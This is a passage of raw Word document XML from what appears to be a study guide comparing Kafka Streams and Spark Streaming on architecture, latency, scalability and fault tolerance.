          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Its micro-batch approach makes it more suited to use cases where fault tolerance, stateful operations, and heavy computation are required across distributed clusters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB83DED"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332C8464"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stream processing for real-time analytics (e.g., sensor data, website clickstream).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDFBB42"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requiring batch-to-stream integration (e.g., combining historical batch data with real-time stream data for predictive analytics).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1F9F08"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lex ETL processes involving real-time transformation, aggregation, and analytics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2724B765"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5E078">
          <v:rect id="_x0000_i3459" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="469C6E17"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When to Use Kafka Streams vs Spark Streaming:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A383E5F"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Kafka Streams When:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABDB06E"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to process data streams in </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>real-time</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and handle each record immediately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2657C9"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want </w:t>
      </w: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xml:space="preserve"> as the messaging system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C027C1B"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system is lightweight and doesn’t require large-scale distributed processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365FF997"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processing logic can be efficiently expressed in terms of stream operations (e.g., filters, joins, aggregations).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF6F15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Spark Streaming When:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E958E7E"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w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>large-scale distributed processing</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and plan to leverage Spark’s broader capabilities (e.g., machine learning, graph processing, SQL).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A88433B"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r use case involves complex computations and aggregations on large datasets that are best handled in </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>micro-batches</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7887DE89"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Your application involves </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>advanced analytics</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, and you need to scale to handle petabytes of data across clusters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F711F24"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813523">
          <v:rect id="_x0000_i3460" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C454D0"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Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F673E5"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more lightweight, low-latency solution that is well-suited for applications that directly use Kafka as their primary messaging system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C90B36"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more powerful for large-scale, distributed stream processing and is ideal when complex computations or integration with Spark’s ecosystem are required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BBFDA21"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solution excels in its niche, so your choice will depend on your </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>use cas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infrastructur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al-time data processing requirements</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E575C9A" w14:textId="7AB28BD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461" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="28888399" w14:textId="54B54421" w:rsidR="007C61B8" w:rsidRPr="00CE4B95" w:rsidRDefault="0065419A" w:rsidP="00DB22BB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="862" w:name="_Toc197868076"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Compare Kafka Streams with Spark Streaming, highlighting the advantages of using Kafka Streams for real-time stream processing</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="862"/>
    </w:p>
    <w:p w14:paraId="01E55BD8" w14:textId="042FD0B8" w:rsidR="001B47F3" w:rsidRPr="004269A3" w:rsidRDefault="001B47F3"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parison of Kafka Streams vs. Spark Streaming:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57012D9B"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oth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are popular frameworks for real-time stream processing, but they serve different use cases and have distinct features. Here’s a detailed comparison highlighting the </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>advantages</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of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real-time stream processing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633F7FBB"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35F4C">
          <v:rect id="_x0000_i3462" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="161413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Architecture and Integration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B395AE5"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0260BC11"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 for Kafka</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Kafka Streams is </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>native</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to Kafka, designed to process data directly from </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka topics</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> without needing a separate cluster for stream processing. It integrates seamlessly with Kafka, making it the natural choice for stream processing within the Kafka ecosystem.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541B867B"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Processing</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Kafka Streams runs </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>within the application itself</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (as part of the JVM), meaning that you don’t need an external processing cluster (like Spark), making it lightweight and simple to deploy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F03004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12E0A8A"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quires Spark Cluster</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Spark Streaming is part of the </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Apache Spark</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ecosystem and typically requires a Spark cluster for distributed processing. It is </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not natively built for Kafka</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> but can consume Kafka data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E57482C"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xml:space="preserve">: Spark Streaming processes data in </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>micro-batches</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (with defined time windows), requiring significant computational resources and infrastructure, making it more complex to deploy than Kafka Streams.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4578732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38E6C80F"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integration</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with Kafka topics, no need for external cluster infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0895AAF7"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rectly runs within your application</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, meaning less overhead and simpler deployment compared to Spark Streaming’s cluster-based architecture.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CC6C1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C551">
          <v:rect id="_x0000_i3463" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5BAE8E"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Latency and Real-Time Processing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714475B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A640E18"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 Latency</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Kafka Streams processes data as it arrives, providing </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>real-time processing</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with low latency (sub-second). It operates at the level of individual messages, with no batching involved, making it ideal for applications requiring real-time stream processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7DA63B"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Micro-batching</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Kafka Streams operates on a per-event basis, which means messages are processed </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>immediately</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> as they arrive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5EF4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5BD324DA" w14:textId="77777777" w:rsidR="001B47F3" w:rsidRPr="004269A3" w:rsidRDefault="001B47F3" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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igher Latency</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Spark Streaming uses </w:t>
      </w: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which processes streams in predefined time windows (e.g., every 1 second, 5 seconds). This introduces a higher latency compared to Kafka Streams, as data is accumulated and then processed in batches.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E39AE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15EF7A92" w14:textId="77777777" w:rsidR="001B47F3" w:rsidRPr="004269A3" w:rsidRDefault="001B47F3" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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er latency</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for real-time stream processing, which is ideal for applications where quick responses are crucial (e.g., real-time fraud detection, live data monitoring).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3DE45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DA50B">
          <v:rect id="_x0000_i3464" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="246DCB6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Scalability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231FFF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DA0C64D"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Scalable within a single application</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Kafka Streams can scale horizontally by </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>splitting the load across multiple instances</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the application, each consuming data from a different partition of the Kafka topic. This allows it to handle higher loads without needing a separate cluster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE436C3"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lastic Scaling</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Kafka Streams can </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>dynamically scale</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> based on the number of Kafka partitions, which is efficient in cloud-based, containerized environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D15B8EC"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056406A9" w14:textId="77777777" w:rsidR="001B47F3" w:rsidRPr="004269A3" w:rsidRDefault="001B47F3" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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tributed Scalability</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Spark Streaming is designed for </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>large-scale processing</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and can scale across a Spark cluster, making it suitable for massive stream processing. However, this scalability comes with the cost of complexity and resource requirements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69603B7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BD6154E"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re lightweight and efficient</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for moderate to large-scale processing when running inside the same application and leveraging Kafka partitioning.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFC1957"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need for a separate cluster</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for stream processing, unlike Spark Streaming.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38650DCD"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1710F">
          <v:rect id="_x0000_i3465" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CF3A3B"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Fault Tolerance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F9AB3A"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C2A6F9E" w14:textId="77777777" w:rsidR="001B47F3" w:rsidRPr="004269A3" w:rsidRDefault="001B47F3" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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in Fault Tolerance</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Kafka Streams provides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nd has built-in fault tolerance by leveraging </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka’s re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If a Kafka Streams instance fails, it can resume processing from where it left off using the offsets stored in Kafka.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2308C5EF"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229E2AE2" w14:textId="77777777" w:rsidR="001B47F3" w:rsidRPr="004269A3" w:rsidRDefault="001B47F3" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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pointing and Recovery</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Spark Streaming provides fault tolerance through </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
